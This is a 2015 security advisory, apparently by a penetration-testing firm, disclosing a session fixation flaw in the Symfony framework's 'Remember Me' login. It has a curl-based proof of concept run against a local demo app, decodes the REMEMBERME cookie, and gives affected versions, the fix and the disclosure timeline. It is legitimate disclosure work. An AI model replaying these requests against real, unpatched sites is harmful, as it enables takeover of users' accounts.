Symfony PHP Framework Session Fixation
Posted on 23 December 2015
Advisory: Symfony PHP Framework: Session Fixation In "Remember Me" Login Functionality A session fixation vulnerability within the Symfony web application framework's "Remember Me" login functionality allows an attacker to impersonate the victim towards the web application if the session ID value was previously known to the attacker. Details ======= Product: Symfony Affected Versions: 2.3.0 to 2.3.34, 2.6.0 - 2.6.11, 2.7.0 - 2.7.6 Fixed Versions: 2.3.35, 2.6.12, and 2.7.7 [2] Vulnerability Type: Session Fixation Security Risk: low Vendor URL: https://symfony.com/ Vendor Status: fixed version released [2] Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2015-013 Advisory Status: published CVE: GENERIC-MAP-NOMATCH CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH Introduction ============ "Symfony is a set of PHP Components, a Web Application framework, a Philosophy, and a Community — all working together in harmony." (from Symfony's homepage) More Details ============ The following details are explained using the official Symfony Demo application[0]. The "Remember Me" login functionality was activated according to [1]. The security configuration file was modified as follows: -- app/config/security.yml --------------------------------------------- security: [...] firewalls: secured_area: [...] remember_me: key: "IdOpAkToufatt8knawt{" lifetime: 604800 path: / always_remember_me: true ------------------------------------------------------------------------ If the following URL is requested, the Symfony application redirects to a login screen where a username and password must be supplied: $ curl -I 'http://localhost:8000/en/admin/post/' HTTP/1.1 302 Found Host: localhost:8000 [...] Set-Cookie: PHPSESSID=8a17gpfjtnfqfdhabthso92sk3; path=/ Location: http://localhost:8000/en/login On submission, an HTTP POST request is performed by the browser: POST /en/login_check HTTP/1.1 Host: localhost:8000 Referer: http://localhost:8000/en/login Cookie: PHPSESSID=8a17gpfjtnfqfdhabthso92sk3 [...] _username=anna_admin &_password=kitten &_csrf_token=h_s6ltxHB3gbGU--SIY6wLCUGf84bLmhs1_LGFEBsUI If the supplied credentials are correct, the Symfony application responds as follows: HTTP/1.1 302 Found Host: localhost:8000 Set-Cookie: PHPSESSID=vk2e3enjr0uafgonr0i3u2b4t5; path=/ Set-Cookie: REMEMBERME=QXBwQnVuZGxlXEVudGl0eVxVc2VyOllXNXVZVjloWkcxcGJnP T06MTQ0NjEyMTYzNDpmMDkxMzhiYzkzYjVmYTk1MTNlYWMyYzY2OTQ1NGU5Y 2IwOWY0OWY3MTFhODNhMjUxNmU0OWE4Njg2MTVmNWRk; expires=Thu, 29-Oct-2015 12:27:14 GMT; Max-Age=604800; Location: http://localhost:8000/en/admin/post/ [...] The cookie PHPSESSID is set to a new value and a new cookie named REMEMBERME is set in the client. The PHPSESSID is a session cookie only and has a limited lifetime. In contrast, the REMEMBERME cookie has a validity of one week. It allows users to stay logged in for longer than the regular session lasts. The REMEMBERME cookie's value consists of four data fields separated by colons and is encoded in base64. The first data field references the application's user object, followed by the base64-encoded username. The third data field is a timestamp of the cookie's expiration date. The last one is a MAC value to protect the other three against manipulation. $ base64 -d <<< QXBwQnVuZGxlXEVudGl0eVxVc2VyOllXNXVZVjloWkcxcGJnPT06MTQ 0NjEyMTYzNDpmMDkxMzhiYzkzYjVmYTk1MTNlYWMyYzY2OTQ1NGU5Y2IwOWY0OWY3MTFhOD NhMjUxNmU0OWE4Njg2MTVmNWRk AppBundleEntityUser:YW5uYV9hZG1pbg==:1446121634:f09138bc[...]68615f5dd $ base64 -d <<< YW5uYV9hZG1pbg== anna_admin $ date -d @1446121634 Thu Oct 29 13:27:14 CET 2015 Proof of Concept ================ If the following URL is requested with an unauthorised session ID, the Symfony application redirects to the login page (as already shown above): $ curl -I 'http://localhost:8000/en/admin/post/' -b 'PHPSESSID=redteam' HTTP/1.1 302 Found Host: localhost:8000 Location: http://localhost:8000/en/login [...] In the case that a valid REMEMBERME cookie is included in the HTTP request, the user is successfully authenticated: $ curl -s -i 'http://localhost:8000/en/admin/post/' -b 'PHPSESSID=redteam; REMEMBERME=QXBwQnVuZGxlXEVudGl0eVxVc2VyOllXNXVZ' 'VjloWkcxcGJnPT06MTQ0NjEyMTYzNDpmMDkxMzhiYzkzYjVmYTk1MTNlYWMyYzY2OTQ1N' 'GU5Y2IwOWY0OWY3MTFhODNhMjUxNmU0OWE4Njg2MTVmNWRk' HTTP/1.1 200 OK Host: localhost:8000 [...] <!DOCTYPE html> <html> [...] <tr> <td>In hac habitasse platea dictumst</td> <td>anna_admin@symfony.com</td> <td>8/23/15, 10:16 AM</td> [...] After this HTTP request, the PHPSESSID value suffices to authenticate the user. In contrast to the regular login procedure, the web application did not assign a new value to the PHPSESSID cookie. If an attacker somehow got in possession of the cookie's value or has successfully set a given cookie value in the user's browser at some point in the past, the attacker is now able to access the web application with the user's permissions: $ curl -s -i 'http://localhost:8000/en/admin/post/' -b 'PHPSESSID=redteam' HTTP/1.1 200 OK Host: localhost:8000 [...] <!DOCTYPE html> <html> [...] <tr> <td>In hac habitasse platea dictumst</td> <td>anna_admin@symfony.com</td> <td>8/23/15, 10:16 AM</td> [...] Workaround ========== Disable the "Remember Me" login functionality within the configuration file security.yml. Fix === Upgrade to a fixed version if possible, otherwise refer to section Workaround. Security Risk ============= The described vulnerability allows an attacker to access a Symfony web application with the attacked user's permissions. The attack requires that the "Remember Me" login functionality is used by the application. Additionally, the attacker either got access to the PHPSESSID cookie value or has successfully set a new value in the user's browser. Because of its requirements, the described vulnerability poses a low risk only. The risk estimation may be increased to medium or high based on the affected web application and the accessible data. Timeline ======== 2015-09-11 Vulnerability identified 2015-09-16 Customer approved disclosure to vendor 2015-10-27 Vendor notified 2015-11-23 Fixed by vendor [2] 2015-12-22 Advisory released References ========== [0] https://github.com/symfony/symfony-demo [1] https://symfony.com/doc/current/cookbook/security/remember_me.html [2] https://symfony.com/blog/cve-2015-8124-session-fixation-in-the-remember-me-login-feature RedTeam Pentesting GmbH ======================= RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/ -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachen https://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen